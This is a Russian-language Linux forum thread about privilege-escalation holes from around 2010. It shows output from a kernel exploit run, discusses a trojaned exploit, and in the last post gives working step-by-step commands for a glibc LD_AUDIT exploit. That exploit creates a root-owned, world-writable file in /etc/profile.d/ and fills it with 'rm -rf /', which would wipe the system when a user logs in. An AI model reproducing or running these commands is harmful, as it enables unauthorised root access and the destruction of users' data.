1 Тема от unregistered

  • unregistered
  • unregistered
  • Постоялец
  • Неактивен
  • Зарегистрирован: 21.03.2010
  • Сообщений: 425
  • Поблагодарили: 38

Тема: Эпичное

http://tmnhy.su/images/sploit.png

Дырка была во всех ванильных x86_64 ядрах выпущенных с 2008 года (>2.6.26).

Поделиться

2 Ответ от MrClon

  • MrClon
  • MrClon
  • Житель MaemoWorld.ru
  • Неактивен
  • Откуда: Москва
  • Зарегистрирован: 19.04.2010
  • Сообщений: 2,962
  • Поблагодарили: 151

Re: Эпичное

Кажется это вот это http://unixforum.org/index.php?showtopic=117484
Уязвимость была исправлена ещё давно, патчи внесены в ядро, но потом кто-то откатил эти изменения.

На форуме появляюсь редко, но N900 пользоваться не перестал, если вдруг что-то нужно пишите в jabber или eMail
Jabber: mrclon@jabnet.org

Поделиться

3 Ответ от unregistered

  • unregistered
  • unregistered
  • Постоялец
  • Неактивен
  • Зарегистрирован: 21.03.2010
  • Сообщений: 425
  • Поблагодарили: 38

Re: Эпичное

Ага, оно самое.

Поделиться

4 Ответ от Deamk

  • Deamk
  • Deamk
  • Постоялец
  • Неактивен
  • Откуда: Ханты-Мансийск
  • Зарегистрирован: 26.12.2009
  • Сообщений: 327
  • Поблагодарили: 30

Re: Эпичное

Проверил, эпично. Перезагрузился (обновление ядра вчера установил, не перезагружал).
И:

deam@notebook:~$ ./boom 
resolved symbol commit_creds to 0xffffffff8108bdb0
resolved symbol prepare_kernel_cred to 0xffffffff8108c190
mapping at 3f80000000
UID 1000, EUID:1000 GID:1000, EGID:1000
$ apt-get update 
E: Не удалось открыть файл блокировки /var/lib/apt/lists/lock - open (13: Отказано в доступе)
E: Невозможно заблокировать каталог со списками пакетов

Поделиться

5 Ответ от MrClon

  • MrClon
  • MrClon
  • Житель MaemoWorld.ru
  • Неактивен
  • Откуда: Москва
  • Зарегистрирован: 19.04.2010
  • Сообщений: 2,962
  • Поблагодарили: 151

Re: Эпичное

Кажется не менее былинное продолжение истории: http://unixforum.org/index.php?showtopic=117674

На форуме появляюсь редко, но N900 пользоваться не перестал, если вдруг что-то нужно пишите в jabber или eMail
Jabber: mrclon@jabnet.org

Поделиться

6 Ответ от Deamk

  • Deamk
  • Deamk
  • Постоялец
  • Неактивен
  • Откуда: Ханты-Мансийск
  • Зарегистрирован: 26.12.2009
  • Сообщений: 327
  • Поблагодарили: 30

Re: Эпичное

MrClon, это называется ССЗБ (Сами Себе Злобные Бакланы).
Раз компилишь - смотри, что компилишь.

Поделиться

7 Ответ от MrClon

  • MrClon
  • MrClon
  • Житель MaemoWorld.ru
  • Неактивен
  • Откуда: Москва
  • Зарегистрирован: 19.04.2010
  • Сообщений: 2,962
  • Поблагодарили: 151

Re: Эпичное

Можно сказать короче: троян.

P.S. а ты посмотрел перед тем как компилировать? (:

На форуме появляюсь редко, но N900 пользоваться не перестал, если вдруг что-то нужно пишите в jabber или eMail
Jabber: mrclon@jabnet.org

Поделиться

8 Ответ от hxka

  • hxka
  • Житель MaemoWorld.ru
  • Неактивен
  • Зарегистрирован: 16.08.2010
  • Сообщений: 4,031
  • Поблагодарили: 570

Re: Эпичное

Такие вещи на виртуалке надо компилировать

A mammal should be able to hunt mice, hibernate, fly, chew its cud, echolocate, invent tools, lay eggs, burrow. Speciation is for insects.

Поделиться

9 Ответ от Deamk

  • Deamk
  • Deamk
  • Постоялец
  • Неактивен
  • Откуда: Ханты-Мансийск
  • Зарегистрирован: 26.12.2009
  • Сообщений: 327
  • Поблагодарили: 30

Re: Эпичное

MrClon, название троянистое, я даже до него не дошёл, robert_you_suck.c глянул и компильнул только. Код там короткий и достаточно наглядный, да и без блобов.

Поделиться

10 Ответ от unregistered

  • unregistered
  • unregistered
  • Постоялец
  • Неактивен
  • Зарегистрирован: 21.03.2010
  • Сообщений: 425
  • Поблагодарили: 38
  • За сообщение: 1

Re: Эпичное

А теперь про glibc. Уязвимость даёт возможность локальному пользователю повысить права до root'а и просто набезобразничать.

Подробности есть на opennet.ru и linux.org.ru.

Дней пять назад шум поднялся, но варианты использования уязвимости были так себе.

В общем, вот работающий вариант использования уязвимости:

 $ umask 0

Имея возможность создания лог-файла в любом каталоге системы, почему бы не использовать /etc/profile.d/

$ LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/profile.d/boo.sh" ping

На вывод ошибок не обращаем внимания, ибо /etc/profile.d/boo.sh уже создан

$ ls -l /etc/profile.d/boo.sh 
-rw-rw-rw- 1 root root 4 Окт 23 19:20 /etc/profile.d/boo.sh

Осталось только наполнить его нужным кодом

$ printf "rm -rf /" > /etc/profile.d/boo.sh

Ну, а когда этот вредный код выполнится, вы поймёте сами. smile

Насколько мне известно пофиксили в дебиане и убунте, изначально не работала на alt linux.

Поделиться